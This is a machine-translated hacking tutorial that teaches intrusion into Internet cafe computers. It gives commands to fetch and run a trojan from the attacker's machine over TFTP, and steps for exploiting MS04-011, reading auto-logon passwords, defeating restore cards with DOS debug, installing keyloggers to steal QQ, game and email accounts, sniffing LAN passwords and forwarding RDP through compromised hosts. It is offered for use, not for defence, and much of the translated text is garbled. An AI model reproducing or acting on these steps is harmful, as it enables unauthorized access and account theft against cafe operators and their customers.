No way to attack Internet cafes!

Author: hacker.... Source: hacker.ab8.cn

I often read xfiles and found many articles on cracking pubwin and Vientiane. Today I decided to write some articles on Internet cafe intrusion, hoping to help some dishes.

1. Internet cafe intrusion

There are many intrusion methods, but what are the most common ways to intrude into Internet cafes? First, log on automatically. Currently, Internet cafes generally use win2000 or windows xp machines. network administrators generally set hosts to automatically log on! In this way, the login window will flash when we start the system! If findfass.exe tries to find the login account and password, it will not succeed! Because the account number password is rooted in the memory, findfass.exe uses the winlogon PID Number and the correct domain name to find the memory block with the encrypted segments (storing the encrypted login password) and then decrypts it, in this way, you can obtain the plaintext password. In fact, all accounts and passwords automatically logged on to the Registry are in the registry. In the Registry HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ directory, the AutoAdminLogon key value is 1, indicating automatic login. When the value is 1, open the user and password on the control panel and you will find that the hook before the password has been removed. The key value corresponding to defauserusername is the login user name, and the key value corresponding to defapassword password is the login password. In fact, Trojan 2006 on the top of the ocean has a function and the principle is the same, but it cannot be read out due to permission issues. In this way, we can find all the Password accounts. Also, you must know that the accounts for automatic logon to an internet cafe are generally the same, and the network management usually sets them in the Administrator group, at least the user group, to facilitate the Internet access for Network Worms. Do I still have trouble intruding my password account? Server services of Internet cafes are generally disabled, so we cannot use ipc for intrusion. We cannot use opentelnet.exe either, because it depends on ipc connections, and remote control of dameware is also ineffective. The same is true. We can use recton with a small and practical tool to enable telnet. This tool is particularly useful under win2000.

1.

After we enable telnet, we first go to telnetand start tftpd32.exe on the local machine, and then telnet-I myip get 3721.exe c: \ 3721.exe. this would transfer our Trojan 3721.exe, such as radmin, to the next one.

Run 3721.exe directly under telnet.

The other method is the ms04011 vulnerability. Don't think it is outdated. The vulnerability is still quite common in Internet cafes. Many Internet cafe network administrators only install games and reinstall the system, I do not pay attention to writing vulnerabilities, so I am too lazy to patch them! We use DSScan to scan 192.168.0.1-192.168.0.255. You may be pleasantly surprised. By using the ms04011 overflow tool, we immediately got the system permission.

3.

There are also many intrusion methods, you can move xscan out to scan. Many cainiao like to use the SDK to scan empty passwords in Internet cafes. In fact, this tool is weak in user account password scanning. I have tried it before, I used the first method above to find that all Internet cafes have an administrator account with an empty password. I used the SDK to scan only a few machines and have this account. I often use my favorite

Lightning fox-Firefox port scanner to scan Internet cafe hosts, first server, etc. Scanning a scanner quickly takes several minutes to scan Port 1 to port 10000. If you find that the server has 80 faults, you can see if a website has been set up. Check whether the website is vulnerable and find a way to upload an asp Trojan to improve permissions. If the movie server is installed with serv_u and you have an account, try serv_u overflow.

2. Internet cafe mauma

The most important thing to install a trojan in an Internet cafe is to restore the trojan. Currently, there are three types of restoration systems in the internet cafe: Recovery card, recovery genie, and freezing point recovery genie. In fact, the so-called hard disk protection card is written in the rom hook int 13 program, blocked

Some functions are called, such as AH = 3, 5, and so on. In the interrupt vector table, SEG and OFFSET of INT 13

Description: [13 h * 4 + 2], [13 h * 4]. Save the program in this directory and replace it with your own code,

When you AH = 2, it will call the original INT 13 address to complete (Business Week.

You only need to find the entry to the original INT 13 to do whatever you want.

The specific process is as follows:

Press and hold the F8 key during the boot process to enter the pure dos environment. Note ";" and comment it.

Prompt c :,

Type c: \ debug,

-A100

-Xor ax, ax

-Int 13

-Int3

; Find the original int 13 entry.

Enter t and press enter until the displayed address is F000: xxxx.

, The following command is: mov dl, 80 (practice eyesight -. Press q to exit.

Write down this address and enter it at (0: 13 H * 4) = 0: 4cH.

For example, the obtained address is F000: 9A95.

Run debug again and type:

-E 0: 4c 95 9A 00 F0 e: Write the data table "95 9A 00 f0" to the byte starting with 0: 4c.

-Q

Note: Make sure that you fill it out carefully. If you fill it in incorrectly, the system will crash. OK. The cracking is complete.

Enter c: \ at the prompt.

C: \ win

Enter the windows system, so this time you do everything in the windows System (Business Week), with the next

Will be stored by the recovery card.

We all know this method, but the operation is also a little dangerous and cannot be started. What's more, win2000 does not have a dos environment, so it won't work? Haha, I haven't

Make this dangerous attempt. There are a lot of tools you can download to crack the recovery card. You can test what tools are best.

As for the recovery card, there is a password reader on the Internet, but the tool can only be used under win98. In win2k, we can use winhex to crack the attack. This method works very well,

It should be the best way. Enter the wrong password at will. The error window will pop up and will not change. Use winhex to find the main memory, find the recovery genie, and then search for us to start.

Incorrect password. There should be a correct password next to the wrong password. Just enter the correct password and try again. This is simple!

As for restoring the ice point, it seems that there is no way to crack it. This is really amazing. However, he has an option, that is, how many times after the restart will not be restored. If it's okay, you can restart more.

Just give it a try. Don't break down the machine.

After restoration, the trojan is installed. We 'd better install a keyboard record or password to intercept Trojans, steal QQ, game accounts, email accounts, and so on. For example, you can use tools such as password sticky.

Set the default homepage of the browser as your webpage Trojan. If the default homepage of an internet cafe is the same, and you have the ability to intrude into that website, it is better to mount a Trojan on the default homepage!

3. Internet cafe sniffing.

If you want to know the QQ number of a mm in the Internet cafe, you can use QQSniffer and Ver2005build5.5. Xniffer can also be used to sniff TCP/IP protocol passwords transmitted in plain text, such as pop. smtp. ftp, in the local network or machine. The format is xsiff.exe-pass-hide-log pass. log xsiff.exe-tcp-udp-asc-addr 192.168.1.1. If you do not like one, there is also a password listener, which is used to listen to the password of the web page, including the mailbox on the web page, forum, chat room, and so on. By running on a computer, you can monitor the account and password of any computer on the LAN, display and save the password, or send it to the user's designated mailbox. I often have a password listener 2.4 cracked version to listen to others in Internet cafes.

Password! Of course, Internet cafes are most suitable for dns Spoofing!

3.

4. port forwarding.

In order to control Internet cafe machines anytime and anywhere, you can also at home! We 'd better Configure port forwarding. First, we can use fport.exe (this tool is included in the angelshell1.0 package) in the format of fport. However, you do not need to install a backdoor when using fport, but you only need common permissions to execute it. The Internet cafe server is generally in win2000server version. If the Administrator does not pay attention to it, open 3389 for it. If the ip address is 192.168.0.1, execute fport.exe 3389 myip 9999 in the command line. Here, myip can be a zombie with a public ip. Run fportclient.exe on the meat chicken of the public network. We log on to port 9999 of the Internet ip and enter the internet cafe host. You can watch any movie on the top, just do it if you don't find it. Let's just do it. We can also install a proxy for the Internet cafe host. Use htran2.4 and SocksCap. Execute htran.exe-install (install socks5service installation, htran.exe-start (start Socks5 service), and then execute "htran.exe-s-connect" for Internet zombie ip 3389. Execute htran.exe-s-listen 3389 5200 (listening port) on the local public network chicken. Now using SocksCap To Connect Port 5200 of 218.3.1.1 is equivalent to entering the internet cafe host. We can also

Use vidc to map ports. This is almost the same as fport.

This article is about to end. In fact, there is no advanced technology. In fact, various problems may be encountered during intrusion. Can these problems be solved. Is the essential difference between a master and a cainiao! I hope my friends who like to exchange technologies can contact me. My QQ number is 156544632. My site

Transfer